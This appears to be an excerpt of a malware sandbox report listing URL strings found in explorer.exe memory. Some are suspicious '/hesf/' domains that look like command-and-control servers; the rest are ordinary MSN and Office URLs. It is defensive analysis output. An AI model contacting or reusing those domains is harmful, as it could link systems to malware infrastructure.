          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shop/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shop/hesf/www.shayun.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shopReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.schistdisc.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.schistdisc.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.schistdisc.com/hesf/www.1320detailingsupplies.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.schistdisc.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shayun.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shayun.net/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shayun.net/hesf/www.brownkrosshui.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shayun.netReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.svgco.life
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.svgco.life/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.svgco.life/hesf/www.pancakesandwaflesbeverages.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.svgco.lifeReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tygyro.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tygyro.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tygyro.com/hesf/www.87b52.club
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tygyro.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usbulletinnow.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usbulletinnow.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usbulletinnow.com/hesf/www.im-newbie-journal.online
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usbulletinnow.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
          Source: explorer.exe, 0000000F.00000002.3851844225.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076911253.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077182219.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
